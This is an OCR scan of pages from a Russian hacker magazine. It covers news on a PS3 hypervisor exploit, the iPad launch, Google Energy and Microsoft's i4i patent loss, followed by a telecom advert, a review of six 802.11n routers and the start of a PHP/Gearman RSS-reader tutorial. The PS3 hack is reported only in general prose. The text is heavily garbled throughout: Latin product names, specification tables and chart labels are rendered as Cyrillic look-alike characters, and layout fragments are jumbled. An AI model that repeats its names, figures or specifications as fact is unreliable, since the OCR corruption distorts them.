разработки для Р53, и, в конечном итоге, увидеть софт 
для полноценной взломанной консоли. В результате 
работы, на которую было потрачено 3 года, 2 месяца и 
1 1 дней, хакер добился получения полного доступа к 
системной памяти и процессору, что до этого не удава- 
лось никому. Дело в том, что Р53, также, как и ХЬохЗбО, 
зависят отспециального гипервизора, встроенного в 



консолях для безопасности. В отличие отХЬох’а, на Р53 
можно установить обычный Ы пих, но тот будет запущен, 
опять же, под контролем гипервизора, накладывая 
ограничения для ядра І_іпих кернел. Что делает слоит? 
Он отчасти нейтрализует гипервизор, предоставляя 
полный доступ к записи/чтению оперативной памяти 
и гіпдО, а также возможность сдампить гипервизор. 
Ксчастью для 5опу, гипервизор - не единственная 
проблема на пути кзапуску пиратских игр. Каждая 
игрушка защищена с помощью ключа, который 
хранится на специальной области диска РОМ Магк. 



Прошивка привода считывает этот ключ и снабжает им 
гипервизор, чтобы тот имел возможность дешифровать 
данные игры во время загрузки. Поэтому для запуска 
игр гипервизору нужны ключи для каждой из игр - и 
это не единственная сложность. В любом случае, такой 
сплоит- серьезный шагв этом направлении. Отметим, 
что для взлома не требуется никакого вмешательства 
в железо - не нужно устанавливать мод-чипы, как 
это было с Р52. Достаточно установить на Р53 Ыпихи 
запустить сплоит. 



ТАК ВОТ ТЫ КАКОЙ, ІРАО 




выход на наушники. Еще один офигенный плюс - это 
книжный онлайн-магазин іВоокзіоге, специально 
заточенный для планшета. Атеперьотом, чего в ІРаб 
нет: нет камеры, ни фронтальной, ни какой-либо еще, 
так что о 5куре и фото можно забыть; уже традиционно 
нет поддержки Еіазб, что для интернет-планшета, 
мягко говоря, странно; нет ИЗВ-порта ; для этого нужен 
переходник, который, правда, поставляется в комплек- 
те. Габариты устройства (ШхВхГ) 242.8 х 189.7 х 13.4, 
вес 680 или 733 грамма, взависимости от модели. С 
ценами ситуация следующая - модель ІРаб ѴѴі-РІ стоит 
от $500 до $700, в зависимости отемкости, моделыРаб 
ѴѴі-РІ+36 от $600 до $800. 



Вот и пришел конец слухам и домыслам, которые весь 
последний годактивно циркулировали вокругновой 
разработки компании Арріе - планшетный ПК, полу- 
чивший имя ІРаб, наконец, был представлен публике. 
Итак, таблетка от Арріе являет собой следующее: 
ЕЕО-дисплей 9.7" с разрешением 1 024 х 768 и, конеч- 
но, с поддержкой М иШ-ТоисЬ ; процессор Арріе А4 с 
тактовой частотой 1 ГГц; от 16 до 64 Гб флэш-памяти. 



Базируется девайс на іРНопе 05 3.2, которая, кстати, 
несовместима с обычными іРНопе и іРоб ІоисЬ, однако 
функционал ОСьобеспечивает примернотакойже. 

0 беспроводных коммуникациях в Арріе, разумеется, 
тоже подумали - младшая модель планшетника осна- 
щается ѴѴіЕі и ВіиеіооіН, а старшие модели несут в себе 
поддержку 36-сетей. Батареи іРаб, по словам Стива 
Джобса, должно хватать на 10 часов активной работы 
без подзарядки. Помимо 
перечисленного, добавим 
сюда 6Р5, акселерометр, 
датчикосвещенности, 
встроенный динамики 



МОРОЗЫ КРЕПЧАЮТ: У СБЕРБАНКА 
ЗАМЕРЗАЛ КАЖДЫЙ 44-Й 
БАНКОМАТ. 



► 014 
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ПАНИКОВАТЬ ВСЕ ЕЩЕ РАНО? 



Любопытная и неоднозначная новость при- 
шла от компании боодіе, в последние годы 
сместившей Місго5оЛс«поста»Оси Зла — об- 
ластей, неохваченных «Гуглом», и так остается 
все меньше, атеперь гигант решил податься 
еще и на энергетический рынок. Филиал 
боодіе Епегду подал заявку в Федеральную 
комиссию по регулированию энергетики США 
на получение лицензии для работы в энер- 
гетическом бизнесе, и, если заявку одобрят, 
у боодіе в числе прочего, будет возможность 
заниматься торговлей электроэнергией. В 
самом «Гугле», впрочем, успокаивают, заяв- 
ляя, что торговля в их планы совсем не входит, 
просто компания не прочьоптимизировать в 
целях экономии собственные энергоресурсы, 
а также заняться исследованиями в областях 
альтернативной и возобновляемой энерге- 
тики. Представители ФКЭР, в свою очередь, 
сообщают, что никаких поводов для отказа 
боодіе не видят, ведь поисковый гигант не 
владеет ни собственными электростанциями, 
ни другими энергетическими предприятиями, 
так что угрозы монополии боодіе создать явно 
не может. 



НОВЫЙ ПРОИГРЫШ 
МІСВ030РТ 



будебные дела в отношении «мелкомяг- 
ких» ни для кого уже, в общем-то, не новость 
— М іеговой постоянно с кем-то судится, и 
желающих ответить компании тем же предоста- 
точно. Недавно в копилку Місгозоіі добавился 
очередной проигранный процесс, притом 
очень неприятного характера — судзапре- 
тил компании продавать бііісе 2003 и 2007, 
и его требование пришлось исполнять — из 
онлайнового магазина компании были убраны 
все «криминальные» версии «бфиса». Из-за 
чего разгорелся сыр-бор? Из-за патента на 
технологию, предназначенную для измене- 
ния структуры документа, права на которую 
принадлежат канадской компании І4і. Ранее 
эти функции гармонично дополняли текстовый 
процессор ѴѴогсІ, а послетого как Місгозоіі 
интегрировали в ѴѴогсІ 2003 свою аналогичную 
разработку бизіопп ХМІ_, І4і остались не удел. 
Разбирательство длилось с 2007 года, и в итоге 
суд приговорил Місгозоіі нетолько к штрафу 
в $290 млн., но и обязал софтверного гиганта 
снятье продажи все «криминальные» версии 
бГГісе, что и было проделано. Місгозоіі, конеч- 
но, уже подали на апелляцию, притом во второй 
раз — первую апелляцию суд отклонил, но 
пока в компании могутлишь развести руками 
и предложить покупателям скачать бету бііісе 
2010, в которой злосчастной функции уже нет. 

Из ѴѴогсІ 2007 и бііісе 2007 бизіопп ХМ б также 
пообещали убрать в самое ближайшее время. 





АБОНЕНТ ВСЕГДА В ВЫИГРЫШЕ! 



Специальное предложение: 

Т Р П Р СЬ П II ИНТЕРНЕТ 

I Ь |В С V и П ПОДКЛЮЧЕНИЕ БЕСПЛАТНО 

• Подключение - в любом месте Москвы и Московской обл, 

* Срок подключения а Москве - 1 4 дней, в Московской о6л + - от 14 до 30 дней» 

* Установка прямого московского телефонного номера 
• Многоканальные телефонные номера 
* ІР-телефония 

■ Выделенные линии Интернет 
* Корпоративные частные сети (ѴРК) 

• Хостинг, услуги оаіе-центра 

РІИ Телеком мллгт.гті.ги е-таіІііпІо@гті.ги (495)988-8212 

Приглашаем специалистов, имеющих опыт работы в области телекоммуникаций 
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РЕВКІІМ 



I Сергей Никитин 
Тестер: Андрей Муравьев 



1Ш-3700 



I 






ТРЕИОпеІ 

ТЕѴѴ-652ВРР 





, 






ИЕТСЕАР 



МЕТВЕАР 



ИЕТСЕАР 

ѴШ-2000 



I О-Ыпк 



АЗІІЗ 



ТЕСТИРОВАНИЕ 

БЕСПРОВОДНЫХ 

РОУТЕРОВ 



и-іт 

ОІР-85 



О-Ыпк 

ОІР-655 



АЗІІЗ 

РТ-М6 



СТАНДАРТА 802.1 ІИ 



«ДОЛОЙ ПРОВОДА!», - ИМЕННО ПОД ТАКИМ ЛОЗУНГОМ К НАМ ПРИШЕЛ СТАНДАРТ 
БЕСПРОВОДНОЙ СВЯЗИ ѴѴІ-РІ. СЕГОДНЯ В ЗТОМ НАПРАВЛЕНИИ СДЕЛАН ЕЩЕ ОДИН, 
ШИРОКИЙ ШАГ НА РЫНКЕ ПОЯВИЛОСЬ НЕМАЛО УСТРОЙСТВ, СОВМЕСТИМЫХ С НОВЫМ 
СТАНДАРТОМ ІЕЕЕ 802.Ш, КОТОРЫЙ ОБЕСПЕЧИВАЕТ (В ТЕОРИИ) СКОРОСТЬ ПЕРЕДАЧИ 
ДАННЫХ ДО 600 МБИТ/С! У ЭТИХ УСТРОЙСТВ ЕСТЬ И ДРУГОЕ ВАЖНОЕ ПРЕИМУЩЕСТВО - 
ВОЗМОЖНОСТЬ РАБОТЫ В ДИАПАЗОНАХ 2.4 ИЛИ 5 ГГЦ. В ОБЩЕМ, ПРИОБРЕТАТЬ НОВЫЙ 
РОУТЕР РАНО ИЛИ ПОЗДНО ПРИДЕТСЯ. ЕСЛИ ТЫ РЕШИЛ СДЕЛАТЬ ТАК ПРЯМО СЕЙЧАС, 



ТО НАШ ТЕСТ ТЕБЕ ПОМОЖЕТ. 



МЕТОДИКА 

ТЕСТИРОВАНИЯ 

Тестирование состояло изтрех основных этапов. 

1) Мы подключали к роутеру пару компьютеров, причем один через порт 
І_АІ\І, а второй — через ѴѴАІМ. Между ними начинался обмен данных, 
скорость которого мы и замеряли (скорость ЫАТ]. Передача осуществля- 
лась какв режиме полного дуплекса (вобе стороны одновременно], таки 
только в одну сторону. В настройках роутера устанавливался статистичес- 
кий ІР-адрес. 

2 ) Вторым этапом было создание РРТР-сервера в ѴѴАІЧ -сегменте. Это объяс- 
няется тем, что соединениетакоготипа нагружает роутер сильнее всего. Так 
же, каки в первом случае, мы начинали гонятьтрафики замеряли скорость 
передачиданных. 

3) Третьим этапом было измерение скорости передачи данных по беспро- 
водной сети. Для этого компьютер подключался к свитчу роутера, а ноутбук 
через ѴѴі-Рі. Причем расстояний было два — 1 и 6 метров (на пути следова- 
ния сигнала находились стены]. Адаптеры ѴѴі-Рі были оттого же производи- 
теля, что и роверы. Трафикзащищался шифрованием ѴѴРА2-Р5Кс ключом 
АЕ5. 



ТЕСТИРУЕМОЕ ОБОРУДОВАНИЕ: 

Азіізрт-тб 

0-ШК0ІР-655 

0-ІЖ0ІР-855 

Ш6ЕАРѴШ-2808 

Ш6ЕАРѴШР-370В 

ТРЕШЕТТЕѴѴ-652ВРР 



ПРОПУСКНАЯ СПОСОБНОСТЬ РРТР, МБИТ/С 



АзизНТ-ІЧіб 
О-Ыпк ОІР-655 
О-Ыпк ОІР-855 
МЕТ6ЕАРѴУІЧ Р-2000 
N ЕТ6ЕАВ ѴѴІЧ ОВ-3700 
ТВЕІЧ0пеІТЕѴѴ-б52ВВР 

Іап->ѵѵап ■ РйХ ■ ѵѵ 



1 24 & 



72.45 



УСТРОЙСТВА о-иык ПОКАЗАЛИ себя весьма неплохо и в 
СЛОЖНОМ ТЕСТЕ ПРОИЗВОДИТЕЛЬНОСТИ РРТР-СОЕДИНЕНИЯ 



► 016 
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ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ИНТЕРФЕЙСЫ: 1ХѴѴАЫ (РЧ-45) 1 0/100/1 000 МБИТ/СЕК, 4Х1_АЫ (Р.І-45] 
10/100/1000 МБИТ/СЕК 

БЕСПРОВОДНАЯ ТОЧКАДОСТУПА ѴѴІ-РІ: ІЕЕЕ 802.1 1 В/6 + ІЕЕЕ 
802. 1 1 N (ДО 300 М БИТ/СЕК) 

ЧАСТОТНЫЙ ДИАПАЗОН, ГГЦ: 2, 4-2,5 

БЕЗОПАСНОСТЬ: ѴѴЕР (ДО 1 28 БИТ], ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
[ТКІР.АЕ5] 

ФУНКЦИИ РОУТЕРА: ЫАТ/ЫАРТ, ОѴІЧОМБ, 5ТАТІС К01ЛІІЧ6, ОНСР, 
Е2СЮ5 

ФУНКЦИИ ФАЙРВОЛА: 5РІ, РАСКЕТ ЕНТЕР, ЕІРІ_ РИТЕР, МАО РИТЕР 
ПОДДЕРЖКА СОЕДИНЕНИЙ: РРРОЕ, РРТР, І_2ТР, СТАТИЧЕСКИЙ И 
ДИНАМИЧЕСКИЙ ІР-АДРЕС 

ДОПОЛНИТЕЛЬНО: Е2$ЕТІІР,ѴѴР$, МЕДИА-СЕРВЕР ІІРІ\ІР,\Л/АІ\І 
ВРЮ6ІЫ6, АЮІ5К, 2 ПОРТА 115В 2.0 ДЛЯ ПОДКЛЮЧЕНИЯ ВНЕШНИХ 
УСТРОЙСТВ 

■■■■■■■■□□ 

+ 

Роутер А5И5 РТ- N 1 6 обладает обширным набором функций. Например, 
кдвум имеющимся ІІ5В-портам можно подключить жесткий диск или 
принтер, сделав их доступными для использования через сеть. При этом 
роутер может сам скачивать заданные файлы на жесткий диск (через 
НТТР, РТР и ВТТоггепІ:] даже при выключенном ПК. Устройство постро- 
ено на мощных компонентах — его основа это чип Вгоабсот ВСМ4718, 
работающий с частотой 533 МГц, и 128 Мб памяти ОВР2. Роутер снабжен 
очень продуманным интерфейсом, с которым разберется даже начина- 
ющий; реализована функция ѴѴР5 (автоматическая настройка беспро- 
водной сети) и Ег0о5 (приоритезация трафика). Также есть несколько 
экзотическая функция переброса трафика с порта ѴѴАЫ на приставку 
ІРТѴ на канальном уровне безучастия ОРИ -роутера. Для работы с оте- 
чественными провайдерами есть все необходимое. 

Несмотря на гигабитные порты, скорость ЫАТ не поднялась выше 145 
Мбит/с. Скорость работы с РРТРтакже была не самая выдающаяся. 



х 




0ІК-655 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ИНТЕРФЕЙСЫ: 1ХѴѴАІЧ (РЧ-45) 10/100/1000 МБИТ/СЕК. 4ХБАМ (РЧ-45І 
10/100/1000 МБИТ/СЕК 

БЕСПРОВОДНАЯ ТОЧКАДОСТУПА ѴѴІ-РІ: ІЕЕЕ 802.1 1 В/6 + ІЕЕЕ 
802.1 1 N (ДО 300 МБИТ/СЕК) 

ЧАСТОТНЫЙ ДИАПАЗОН, ГГЦ: 2 4-2 5 

БЕЗОПАСНОСТЬ: ѴѴЕР (ДО 1 28 БИТ], ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР/АЕ5), ѴѴР8 

ФУНКЦИИ РОУТЕРА: ЫАТ/ІЧАРТ, ОѴІ\ЮЫ5, РНСР, 5ТАТІС Р01ГПІЧ6, 

І6МР МІА.ТІСА5Т , 005 

ФУНКЦИИ ФАЙРВОЛА: $РІ, ІІРЕ РИТЕР, МАС РИТЕР, ІР ЕНТЕР, 

АССЕ55 СОЫТРОБ 

ПОДДЕРЖКА СОЕДИНЕНИЙ: РРРОЕ, РРТР, Б2ТР, СТАТИЧЕСКИЙ И 
ДИНАМИЧЕСКИЙ ІР-АДРЕС 
ДОПОЛНИТЕЛЬНО: ѴѴР5, ІІ5В-ПОРТ 

■■■■■■■■■□ 

+ 

Многофункциональный роутер с интересными возможностями, одна из 
которых заключается в возможности подключения адаптера ЗѲ, чтобы 
иметьдоступ к соответствующим сетям. Крометого, имеются функция 
настройки приоритезации трафика, поддержка ІОМР МиШсазр 0о5, 
множество фильтров для организации доступа, а также очень простая и 
быстрая автоматизированная настройка беспроводного соединения с 
помощью ѴѴР5. Помимо развитого функционала, устройство порадовало 
высокой производительностью во всехтестах, включая испытания на 
скорость передачи данных по беспроводной сети. Специально для реа- 
лий российских провайдеров в настройках соединения предусмотрены 
нужные варианты РРТР, РРРоЕ и І_2ТР. Да и, в общем, интерфейс неплох. 

Серьезных недостатков обнаружить не удалось, разве что крайне 
неудобно реализована работа с подключенными ІІ5В-устройствами, 
которая требует дополнительного программного обеспечения. 



ХАКЕР 03 /134/ 10 



► 017 







РЕВКІІМ 



ПРОИЗВОДИТЕЛЬНОСТЬ ѴѴІ-РІ, 1 МЕТР, МБИТ/С 


Азиз КТ-ІЧіб 
0-І_іпк ОІК-655 
Б-Ыпк ОІК-855 


40.89 

^ ■ 72.33 


ШШГ92 


1МЕТ6ЕАКМ1ЧК-2000 

МЕТ6ЕАКѴѴІЧ0К-3700 

ТКЕМОпеІТЕѴѴ-б52ВКР 

ІІрзігеат ■ ЬоШ н сіо 


■ 46.18 , , 

48.02 


ѵѵпзігеат 



БЕЗОГОВОРОЧНЫМ ЛИДЕРОМ ЯВЛЯЕТСЯ РОУТЕР О-І.ШКОІК-855 
И, В ОСНОВНОМ, БЛАГОДАРЯ ПОДДЕРЖКЕ 5ГГЦ ДИАПАЗОНА 




о-шк 

ОІК-855 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ИНТЕРФЕЙСЫ: 1ХѴѴАІЧ (Р^-45] 10/100/1000 МБИТ/СЕК, 4ХБАІЧ (РЧ-45) 
10/100/1000 МБИТ/СЕК 

БЕСПРОВОДНАЯ ТОЧКА ДОСТУПА ѴѴІ-РІ: ІЕЕЕ 802. 1 1 В/О + I ЕЕЕ 

802.1 1 N (ДО 300 МБИТ/СЕК) 

ЧАСТОТНЫЙ ДИАПАЗОН, ГГЦ: 2, 4-2,5, 5 

БЕЗОПАСНОСТЬ: ѴѴЕР (ДО 128 БИТ], ѴѴРА/ѴѴРА-Р5К.ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР.АЕ5І 

ФУНКЦИИ РОУТЕРА: ЫАТ, ОѴІ\ЮІ\І$, 5ТАТІС воілиме, РНСР, 00$ 
ФУНКЦИИ ФАЙРВОЛА: 5РІ, ИРБ ЕІБТЕР, МАО БИТЕР, ІР РПТЕР, йМ2 
ПОДДЕРЖКА СОЕДИНЕНИЙ: РРРОЕ, РРТР, Б2ТР, СТАТИЧЕСКИЙ И 
ДИНАМИЧЕСКИЙ ІР-АДРЕС 
ДОПОЛНИТЕЛЬНО: ѴѴР$, ІІ5В-ПОРТ, ЖК-ДИСПЛЕЙ 



Ш6ЕАР 

ѴШ-2000 




ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 



ИНТЕРФЕЙСЫ: 1ХѴѴАІЧ (РЧ-451 10/100 МБИТ/СЕК, 4ХБАІЧ (РЧ-45) 10/100 
МБИТ/СЕК 

БЕСПРОВОДНАЯ ТОЧКАДОСТУПА ѴѴІ-РІ: ІЕЕЕ 802.1 1 В/6 + ІЕЕЕ 
802.1 1 N (ДО 300 МБИТ/СЕК) 

ЧАСТОТНЫЙ ДИАПАЗОН, ГГЦ: 2, 4-2, 5 

БЕЗОПАСНОСТЬ: ѴѴЕР (ДО 1 28 БИТ], ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР.АЕ5І 

ФУНКЦИИ РОУТЕРА: ЫАТ, ОѴІ\Ю№, 5ТАТІС КОЦТІІЧе, йНСР, ІІРІЧР, 
005 

ФУНКЦИИ ФАЙРВОЛА: 5РІ, ІІРБ БИТЕР, МАС БИТЕР, КЕУѴѴОРО 
ВБОСКІІЧѲ 

ПОДДЕРЖКА СОЕДИНЕНИЙ: РРРОЕ, РРТР, СТАТИЧЕСКИЙ И ДИНА- 
МИЧЕСКИЙ ІР-АДРЕС, ВІВРОІ\Ю 
ДОПОЛНИТЕЛЬНО: ѴѴР5, СЧЕТЧИК ТРАФИКА 



□ 



□ □□ 



+ + 



При взгляде на этот роутер бросается в глаза ЖК-экран — его присутствие 
очень помогает, потому что на нем отражается масса нужной и полезной 
информации. В тестах на производительность мы использовали частоту 5 
ГГц, на которой способно работатьэто устройство, и оно продемонстриро- 
вало лучшую скорость передачи данных, доказав преимущество частоты 
5 ГГц перед более загруженной 2.4 ГГц. Но роутер умеет строить беспро- 
водные сети на обеих частотах сразу. Крометого, производительность 
1_А1\1-\Л/АЫ была на высоте, чему, возможно, поспособствовали и гигабит- 
ные порты ЙЬегпеГ У роутера есть порт 115В, к которому можно подключать 
различныеустройства, такие каквнешние ИОО и принтеры, но, какиу 
И-Упк ОІ Р-655, работа с ними реализована через специальное ПО. 



В роутере решена проблема с обеспечением одновременной работы 
двух соединений на порте ѴѴАІЧ, то есть роутер может одновременно 
маршрутизироватьтрафик и в интернет, и во внутреннюю сеть провай- 
дера. Такая возможность необходима для работы в российских сетях, 
поэтому ее наличие очень важно. Интересен встроенный счетчик 
трафика, который, втом числе, может разорвать соединение в случае 
превышения заданного объема. Из других особенностей стоит отметить 
возможность блокировки определенных сайтов и служб, приоритезацию 
трафика и ограничение скорости. Несмотря на невысокую цену, в тестах 
на производительность ЫЕТОЕАВ ѴѴЫВ-2000 показал весьма достойные 
результаты. 



Основной недостаток устройства — его цена, которая слишком Недостатками можно считать невысокую скорость передачи данных по 

велика для домашнего роутера, даже обладающего такими возмож- беспроводной сети, не очень приятный веб-интерфейс, а также то, что 
н остям и. поддержка соединений Е2ТР отсутствует. 



► 018 
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Ш6ЕАР 

ѴШ-3700 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ИНТЕРФЕЙСЫ: 1ХѴѴАІЧ Ш-45) 1 0/1 00/1 000 МБИТ/СЕК, 4ХБАЫ (РО-45) 
10/100/1000 МБИТ/СЕК 

БЕСПРОВОДНАЯ ТОЧКАДОСТУПАѴѴІ-РІ: ІЕЕЕ 802.1 1 В/С + ІЕЕЕ 
802.1 1 N (ДО 300 МБИТ/СЕК) 

ЧАСТОТНЫЙ ДИАПАЗОН, ГГЦ: 2,4~2,5, 5 

БЕЗОПАСНОСТЬ: ѴѴЕР (ДО 1 28 БИТ], ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР.АЕ5) 

ФУНКЦИИ РОУТЕРА: І\ІАТ, ВѴІ\ЮІ\І5, 5ТАТІС РОІГПІЧ0, ОНСР, ИРЫР, 005 
ФУНКЦИИ ФАЙРВОЛА: 5РІ, ИРБ БИТЕР, МАО БИТЕР, КЕУѴѴОРО 
ВБОСКІІЧѲ 

ПОДДЕРЖКАСОЕДИНЕНИЙ:РРРОЕ, РРТР, СТАТИЧЕСКИЙ И ДИНА- 
МИЧЕСКИЙ ІР-АДРЕС, ВІ0РОІХЮ 
ДОПОЛНИТЕЛЬНО: ѴѴР5, СЧЕТЧИК ТРАФИКА 



ТКЕМШ 

ТЕѴѴ-652ВРР 



ТЕХНИЧЕСКИЕ ХАРАКТЕРИСТИКИ: 

ИНТЕРФЕЙСЫ: 1ХѴѴАЫ (К.І-45) 10/100 МБИТ/СЕК, 4ХБАІЧ (Р^-45) 10/100 
МБИТ/СЕК 

БЕСПРОВОДНАЯ ТОЧКАДОСТУПАѴѴІ-РІ: ІЕЕЕ 802. 1 1 В/Ѳ + ІЕЕЕ 
802.1 1 N [ДО 300 МБИТ/СЕК) 

ЧАСТОТНЫЙ ДИАПАЗОН, ГГЦ: 2,4-2, 5 

БЕЗОПАСНОСТЬ: ѴѴЕР (ДО 1 28 БИТ), ѴѴРА/ѴѴРА-Р5К, ѴѴРА2/ѴѴРА2-Р5К 
(ТКІР.АЕЗ) 

ФУНКЦИИ РОУТЕРА: ЫАТ, ОѴІ\ЮЫ5, 5ТАТІС РООТІЫО, йНСР 
ФУНКЦИИ ФАЙРВОЛА: 5РІ, ІІЕБ БИТЕР, МАС БИТЕР, ІР БИТЕР 
ПОДДЕРЖКА СОЕДИНЕНИЙ: РРРОЕ, РРТР, Б2ТР, СТАТИЧЕСКИЙ И 
ДИНАМИЧЕСКИЙ ІР-АДРЕС, ВЮРОІ\Ю 

Д0П0ЛНИТЕЛЬН0:ѴѴР5 






!□□□ 



+ 

Похожий на 1ЧЕТ0ЕАВ ѴѴЫ Р-2000 (выбор скорости работы по ѴѴі-Еі), 
роутер имеети много отличий. Например, порт 115В для подключения 
различных внешнихустройств, поддержку протокола В1_1\1А, а также воз- 
можность поддерживать две беспроводные сети на разных частотах (2.4 
и 5 ГГц). Что хорошо, доступ к подключенным к роутеру жестким дискам 
может быть получен про 5МВ, а у каждой из сетей ѴѴі-Рі, работающих на 
своем диапазоне, могутбытьсвои собственные настройки параметров 
безопасности. Несмотря ни на что, скорость передачи данных по беспро- 
водной сети не очень высока, но производительность І\ІАТ и пропускная 
способность РРТР-соединения выше всяческих похвал! 

Недостатки у двух моделей ЫЕТВЕАР практически одинаковые: невоз- 
можность работы по протоколу І_2ТР, а также малоприятный ѵѵеб-интер- 
фейс. 



+ 

Еще один роутер, создатели которого демонстрируют заботу об отечест- 
венных пользователях — в настройках можно обнаружить та киетипы 
соединений, как Ризвіа РРТР и Риззіа РРРоЕ. От обычных они отличают- 
ся тем, что позволяют работать одновременно с интернетом и локалкой 
твоего провайдера. Радует, что при самой невысокой цене в обзоре 
устройство показало неплохие результаты во всех нашихтестах. Да, еще 
оно самое малогабаритное — мал золотник, да дорог, как говорится. 

Из функциональных особенностей стоит отметить: можно задать адрес 
сервера ѴРЫ по имени, а не ІР-адресу, ограничения доступа по ІР, МАС 
и ІІРБ, а также функцию простой настройки беспроводной сети ѴѴі-Еі 
Ргоіесіеб 5еШр. 

Отсутствует та кая функция, как приоретизация трафика. Нети многих 
других возможностей, присутствующих у других моделей. 



выводы 

Среди новейших роутеров есть устройства, 
разные по уровню возможностей и стоимос- 
ти, поэтому сделать выбор непросто. Кто-то 



силен в функционале, кто-то в скорости, а 
кто-то делает все очень хорошо, но дорого 
стоит. В итоге, награда «Выбор редакции» 
присуждается О-Ыпк Б I Р-655, который 



быстр, функционален и при этом не очень 
дорог. А награда «Лучшая покупка» достается 
устройству ТВЕІ\Юпеі ТЕѴѴ-652 В Р Р, очень 
хорошо сбалансированномѵ. ~и~ 
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РС_20ЫЕ 



Я УБЬЮ ТЕБЯ. 
Б006И КЕАОЕР! 



МАЛО КТО ПРЕДСТАВЛЯЕТ, КАК УСТРОЕНЫ ПОПУЛЯРНЫЕ ОНЛАЙН-ПРОЕКТЫ ИЗНУТРИ. 
КАЖЕТСЯ, ПОСТАВИВ СОТНЮ СЕРВЕРОВ, МОЖНО ЗАСТАВИТЬ ЛЮБОЙ СЕРВИС ЛЕТАТЬ, НО ЗТО 
НЕ ТАК. ВАЖНО ЭФФЕКТИВНО СПРОЕКТИРОВАТЬ РАБОТУ ПРИЛОЖЕНИЯ И ВЫБРАТЬ ПРА- 
ВИЛЬНЫЕ ТЕХНОЛОГИИ. ПОДОБРАВ УДАЧНОЕ СОЧЕТАНИЕ, ВЫСОКОНАГРУЖЕННЫЙ СЕРВИС 
МОЖНО ПОСТРОИТЬ ДАЖЕ НА САМОМ СКРОМНОМ ОБОРУДОВАНИИ! 



озьмем для примера Ооодіе Реабег. 
Если не сильнозаморачиваться.то 
аналогэтой онлайн-читалки собрать 
можно очень быстро, используя 
голый РНР и Му5СИ. Но добавь туда 
пару тысяч Р55-фидов и несколько десятков 
пользователей — твое приложение взвоет от 
непосильной нагрузки. Зато, если изначально 
подумать, в нужных местах реализовать кэши- 
рование и вместо реляционной базы данных 
использовать Кеу-ѴаІие-хранилища, а саму 
работу сервиса распараллелить на несколько 
серверов, то можно создать настоящий сервис, 
который выдержит серьезную нагрузку. При 
этом сделать все можно даже на РНР! 

НТО МЫ БУДЕМ СТРОИТЬ? 

Хочу внести ясность, что именно мы будем 
делать. Самый простой способ уследить 
за жизнью сайта — это получать новости и 
обновления через П55-ленты — в специаль- 
ном формате, построенном на ХМИ. Сегодня 
у тебя большой выбор: Р55 можно читать 
везде — в почтовом клиенте (например, 



Могіііа ТЬипбегЬігб), браузере, специальной 
программе-агрегаторе или же онлайн. Один 
из самых продвинутых онлайн-агрегаторов, 
конечно, Соодіе Реабег. Пользоваться им 
вроде бы легко: раз оформив подписку на 
нужные ленты, можно заходить на геабег. 
доодіе.сот и в удобном виде читать новости. 
Впрочем, даже у этого сервиса есть недо- 
статки. Мне, к примеру, не сильно нравится 
интерфейс. А многих не устраивают серьезные 
задержки в получении новых сообщений (как и 
любой сервис, Соодіе Реабег скачивает обнов- 
ленные ленты с некоторой периодичностью]. 
Особенно это касается ТѵѵіНег-а, который выда- 
ет ленту всех твоих сообщений. Попробуем 
собрать свою читалку, лишенную последнего 
недостатка, и которой сможешь пользовать и 
ты, и твои друзья. Напомню, что, когда у тебя 
две-три ленты, с ними справится даже твой 
нетбук, но когда люди поймут, что и Соодіе 
можно заставить курить в сторонке, и начнут 
добавлять свои ленты, станет плохо. А мы сде- 
лаем так, что сервис будет работать с любым 
количеством лент: добравшись до ограниче- 



ния, нужно просто добавить еще один сервис. 
Задача нешуточная — предстоит высший 
пилотаж РНР-программирования, а именно 
создание распределенных систем. Помнишь, 
мы рассказывали про облачный компьютинг, 
Атагоп ЕС2 и прочие заморские технологии? 
Вот с их помощью это сделать очень легко — 
нажал кнопочку и у тебя уже два сервера вме- 
сто одного. Используя РНР и немного магии, 
ты сможешь заставить работать на наше благо 
столько серверов, сколько достанешь. 

Строить распределенную систему мы будем 
на базе стандартного ЕАМР-набора, а в 
качестве основной библиотеки используем 
Хепб Егатеѵѵогк и ]Оиегу, а также МуЗОЕ 
для базы данных. Для эффективной рабо- 
ты на нескольких серверах понадобится 
механизм Сеагтап. Предупреждаю, что 
буду рассказывать только о самых важных 
моментах построения распределенной 
системы и не дам сразу скопипастить гото- 
вый код :]. Но ты можешь скачать исходни- 
ки с диска журнала и посмотреть их само- 
стоятельно. 
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ѵоішсиЕШРРишюмсооЕ 



ВЕАРМАИ 

ЗТАСК 



6ЕАКМАМ СЫЕМТ АРІ 

(С,РНР, Регі, МуБСИІЮР, 



ѵоіш 

АРРиСАТКЖ 



СЕАРМАМ УОВ ЗЕРѴЕР 

деагтапсі 



РРОѴШЕО 
ВУ 6ЕАРМАЫ 



С 

I 


ІЕАРІШІѴѴОРКЕРАР 

(С, РНР, Регі, ...] 


1 

1 


ѴО№МКЕРАРРЫСАТІОМС(ШЕ 



БЛОК-СХЕМА ВНУТРЕННЕГО УСТРОЙСТВА ОЕАРМАЫ И ВЗАИМОДЕЙСТВИЯ С ДРУГИМИ ЯЗЫКАМИ И ПРИ- 
ЛОЖЕНИЯМИ 



В РАЗВЕДКУ ЗА ЛЕНТАМИ 

Первым делом тебе надо иметь возможность 
добавлять фиды, которые хочешь читать. Это 
реально сложно, так как ты же хочешь, чтобы 
пользоваться читалкой мог любой, а значит, 
требовать прямого ІЛРІ_ или, упаси бог, зада- 
ния формата, которых у Р55 несколько, никак 
нельзя. Да и сам ЭРУ может быть задан кучей 
вариантов. Так что попробуем написать уни- 
версальную «получал ку» из любого адреса! 

Что же можно вводить? Самый простой 
способ — просто указать адрес сайта, ленту 
которого мы будем читать. Адрес может быть 
как полным, с указанием ЫТр:// в начале, так 
и ограничиваться доменным именем. Поэтому 
первым делом проверь, указан ли протокол, так 
как наш фреймворк не умеет работать с непол- 
ными адресами. Здесь уже придется написать 
немного кода. 

